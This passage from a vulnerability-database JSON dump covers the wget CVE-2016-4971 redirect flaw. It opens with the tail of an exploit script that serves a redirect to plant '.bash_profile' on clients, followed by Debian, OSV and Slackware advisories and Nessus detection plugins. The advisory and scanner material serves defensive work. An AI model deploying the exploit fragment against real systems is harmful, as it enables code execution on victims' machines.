2121\nFILE = '.bash_profile'\n\nhandler = socketserver.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)\n\nprint(\"Ready? Is your FTP server running?\")\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nresult = sock.connect_ex((FTP_HOST, FTP_PORT))\nif result == 0:\n print(\"FTP found open on %s:%s. Let's go then\\n\" % (FTP_HOST, FTP_PORT))\nelse:\n print(\"FTP is down :( Exiting.\")\n exit(1)\n\nprint(\"Serving wget exploit on port %s...\\n\\n\" % HTTP_LISTEN_PORT)\n\nhandler.serve_forever()\n", "sourceHref": "https://0day.today/exploit/36167", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "osv": [{"lastseen": "2022-07-21T08:13:25", "description": "\nOn a server redirect from HTTP to a FTP resource, wget would trust\nthe HTTP server and uses the name in the redirected URL as the\ndestination filename.\nThis behaviour was changed and now it works similarly as a redirect\nfrom HTTP to another HTTP resource so the original name is used as\nthe destination file. To keep the previous behaviour the user must\nprovide --trust-server-names.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n1.13.4-3+deb7u3.\n\n\nWe recommend that you upgrade your wget packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-06-30T00:00:00", "type": "osv", "title": "wget - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2022-07-21T05:54:31", "id": "OSV:DLA-536-1", "href": "https://osv.dev/vulnerability/DLA-536-1", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-03T00:00:50", "description": "It was found that wget used a file name provided by the server for the downloaded file when following a HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client.", "cvss3": {}, "published": "2016-06-30T17:59:00", "type": "osv", "title": "CVE-2016-4971", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2023-02-03T00:00:48", "id": "OSV:CVE-2016-4971", "href": "https://osv.dev/vulnerability/CVE-2016-4971", "cvss": {"score": 0.0, "vector": "NONE"}}], "slackware": [{"lastseen": "2021-07-28T14:46:55", "description": "New wget packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/wget-1.18-i486-1_slack14.1.txz: Upgraded.\n This version fixes a security vulnerability present in all old versions\n of wget. On a server redirect from HTTP to a FTP resource, wget would\n trust the HTTP server and use the name in the redirected URL as the\n destination filename. This behaviour was changed and now it works\n similarly as a redirect from HTTP to another HTTP resource so the original\n name is used as the destination file. To keep the previous behaviour the\n user must provide --trust-server-names.\n The vulnerability was discovered by Dawid Golunski and was reported by\n Beyond Security's SecuriTeam.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/wget-1.18-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/wget-1.18-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/wget-1.18-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/wget-1.18-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/wget-1.18-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/wget-1.18-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/wget-1.18-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/wget-1.18-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/wget-1.18-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/wget-1.18-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/wget-1.18-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/wget-1.18-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n3451af5dd9ca74a1d7e87a1da83c093f wget-1.18-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\ndf8555176d34c6df44790758a70151ad wget-1.18-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n03635033880d7e70c9c27a59d5f8b672 wget-1.18-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n254e001d584854f80f8f009afc36ed31 wget-1.18-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n2568c74e7419e9ef1678158fd4af8e2f wget-1.18-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n6ef91a6cec6685127850af5f2042a54b wget-1.18-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n93d82f4a1fb5a7c27c4541df137a0357 wget-1.18-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n74ea3507a02545c6bef589b1b2f1290a wget-1.18-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nbcab953b2e8d04050b169b203909b01e wget-1.18-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nbc0a058112f39befdac64f6143c2da03 wget-1.18-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n90695857776fb20742a931a774347de6 n/wget-1.18-i586-1.txz\n\nSlackware x86_64 -current package:\n11b4a09faf7636f65d3c6d25b2c9eba1 n/wget-1.18-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg wget-1.18-i486-1_slack14.1.txz", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-06-13T07:12:06", "type": "slackware", "title": "[slackware-security] wget", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-06-13T07:12:06", "id": "SSA-2016-165-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.532542", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "nessus": [{"lastseen": "2022-04-12T16:12:09", "description": "Security Fix(es) :\n\n - It was found that wget used a file name provided by the server for the downloaded file when following an HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client. (CVE-2016-4971)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-12-15T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : wget on SL7.x x86_64 (20161103)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:wget", "p-cpe:/a:fermilab:scientific_linux:wget-debuginfo", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20161103_WGET_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/95865", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95865);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-4971\");\n\n script_name(english:\"Scientific Linux Security Update : wget on SL7.x x86_64 (20161103)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - It was found that wget used a file name provided by the\n server for the downloaded file when following an HTTP\n redirect to a FTP server resource. This could cause wget\n to create a file with a different name than expected,\n possibly allowing the server to execute arbitrary code\n on the client. (CVE-2016-4971)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1612&L=scientific-linux-errata&F=&S=&P=7504\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ff28d729\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wget and / or wget-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:wget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"wget-1.14-13.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"wget-debuginfo-1.14-13.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget / wget-debuginfo\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-02T17:03:13", "description": "An update for wget is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe wget packages provide the GNU Wget file retrieval utility for HTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es) :\n\n* It was found that wget used a file name provided by the server for the downloaded file when following an HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client. (CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue.\nUpstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.3 Release Notes linked from the References section.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-11-04T00:00:00", "type": "nessus", "title": "RHEL 7 : wget (RHSA-2016:2587)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:wget", "p-cpe:/a:redhat:enterprise_linux:wget-debuginfo", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2016-2587.NASL", "href": "https://www.tenable.com/plugins/nessus/94550", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:2587. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94550);\n script_version(\"2.11\");\n script_cvs_date(\"Date: 2019/10/24 15:35:42\");\n\n script_cve_id(\"CVE-2016-4971\");\n script_xref(name:\"RHSA\", value:\"2016:2587\");\n\n script_name(english:\"RHEL 7 : wget (RHSA-2016:2587)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for wget is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe wget packages provide the GNU Wget file retrieval utility for\nHTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es) :\n\n* It was found that wget used a file name provided by the server for\nthe downloaded file when following an HTTP redirect to a FTP server\nresource. This could cause wget to create a file with a different name\nthan expected, possibly allowing the server to execute arbitrary code\non the client. (CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue.\nUpstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.3 Release Notes linked from the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:2587\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-4971\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wget and / or wget-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:2587\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"wget-1.14-13.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"wget-1.14-13.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"wget-debuginfo-1.14-13.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"wget-debuginfo-1.14-13.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget / wget-debuginfo\");\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-02T16:56:31", "description": "The remote host is affected by the vulnerability described in GLSA-201610-11 (GNU Wget: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Wget. Please review the CVE identifier and bug reports referenced for details.\n Impact :\n\n A remote attacker could possibly execute arbitrary code with the privileges of the process or obtain sensitive information.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-10-31T00:00:00", "type": "nessus", "title": "GLSA-201610-11 : GNU Wget: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:wget", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201610-11.NASL", "href": "https://www.tenable.com/plugins/nessus/94422", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201610-11.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94422);\n script_version(\"2.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-4971\");\n script_xref(name:\"GLSA\", value:\"201610-11\");\n\n script_name(english:\"GLSA-201610-11 : GNU Wget: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201610-11\n(GNU Wget: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Wget. Please review the\n CVE identifier and bug reports referenced for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process or obtain sensitive information.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201610-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All GNU Wget users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/wget-1.18'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/wget\", unaffected:make_list(\"ge 1.18\"), vulnerable:make_list(\"lt 1.18\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GNU Wget\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-17T14:23:25", "description": "This update for wget fixes the following issue :\n\n - CVE-2016-4971: HTTP to a FTP redirection file name confusion vulnerability (boo#984060).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-08-12T00:00:00", "type": "nessus", "title": "openSUSE Security Update : wget (openSUSE-2016-973)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:wget", "p-cpe:/a:novell:opensuse:wget-debuginfo", 